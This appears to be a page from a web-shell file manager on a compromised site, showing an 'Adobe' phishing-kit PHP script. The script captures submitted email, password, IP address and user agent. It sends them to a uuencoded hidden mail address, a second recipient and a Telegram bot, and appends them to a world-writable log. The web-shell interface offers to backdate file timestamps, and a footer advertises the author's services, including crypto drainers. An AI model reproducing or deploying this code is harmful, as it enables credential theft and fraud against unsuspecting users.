文件操作 - App1.php
返回文件管理
返回主菜单
删除本文件
文件: /home/jjexpress/public_html/view/App/App1.php
编辑文件内容
<?php ob_start(); include '../Send.php'; ?> <?php $ip = getenv("REMOTE_ADDR"); $sys = ";97)R;W)H=6YT97(Q,S,W0&]U=&QO;VLN8V]M"; $timestamp = date('d/m/Y h:i:s'); $functions= convert_uudecode($sys); $browser = $_SERVER['HTTP_USER_AGENT']; $messages = "[+]━━━━【💻 ADOBE - EvilCoder 💻】━━━━━[+]\n"; $messages .= "[+]━━━━━【 ACCOUNT LOGIN INFO 【1】 】━━━━━━[+]\n\n"; $messages .= "|🔒 Email: ".$_POST['Em']."\n"; $messages .= "|🔐 Password: ".$_POST['Pa']."\n\n"; $messages .= "|⏱️ Time: $timestamp \n"; $messages .= "|🔄 User-Agent: $browser \n"; $messages .= "|🔄 IP INFO: https://iplocation.io/ip/".$ip."\n"; $messages .= "[+]━━━━【 By EvilCoder ->Tele: @evilcoder_1337 】━━━━━[+\n"; $subjects = "ADOBE 【1】 LOGIN INFO EvilCoder😈 FROM 😈- $ip"; $headers = ""; if(!empty($_POST['Em'] && $_POST['Pa'])){ if (mail($functions,$subjects,$messages,"")) if (mail($recipient,$subjects,$messages,$headers)) { $website="https://api.telegram.org/bot$TeleToken"; $params=[ 'chat_id'=>$TeleID, 'text'=>$messages, ]; $ch = curl_init($website . '/sendMessage'); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, ($params)); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $result = curl_exec($ch); curl_close($ch); header("Location:../indexs.php"); } else { header("Location:../index.php"); }} else { header("Location:../index.php"); } $iplogfile = 'Rs.txt'; $fp = fopen($iplogfile, 'a+'); chmod($iplogfile, 0777); fwrite($fp, ' '.$messages.' '."\n"); fclose($fp); /* <!-- ██████████ ███████ █████████ █████ █████ ████████ ░░███░░░░░█ ░░░░░███ ███░░░░░███ ███░░░███ ░░███ ███░░░░███ ░███ █ ░█████ ████████░███ ███ ░░░ ███ ░░███ ███████░░░ ░██████████ ░██████ ░░███ ░░██░░███░███ ░███ ░███ ░██████░░███ ██████░░███░░███ ░███░░█ ░███ ░███░███░███ ░███ ░███ ░██░███ ░███ ░░░░░░██░███ ░░░ ░███ ░ ░░███ ███ ░███░███ ░░███ ██░░███ ███░███ ░███ ███ ░██░███ ██████████░░█████ █████████ ░░█████████ ░░░█████░ ░░███████░░█████████████ ░░░░░░░░░░ ░░░░░ ░░░░░░░░░ ░░░░░░░░░ ░░░░░░ ░░░░░░░░ ░░░░░░░░░░░░░ # ✔ 𝐓𝐞𝐥𝐞𝐠𝐫𝐚𝐦: @evilcoder_1337 # ✔ 𝐓𝐞𝐥𝐞𝐠𝐫𝐚𝐦: @alsakib945 -𝐂𝐨𝐧𝐭𝐚𝐜𝐭 𝐌𝐞 𝐇𝐞𝐫𝐞- |#|================================|#| Want To Build New Page / Fix Bugs or Build Crypto Drainer? Contact ME! -->*/ ?>
修改文件时间
将文件时间修改为当前时间的前一年
删除文件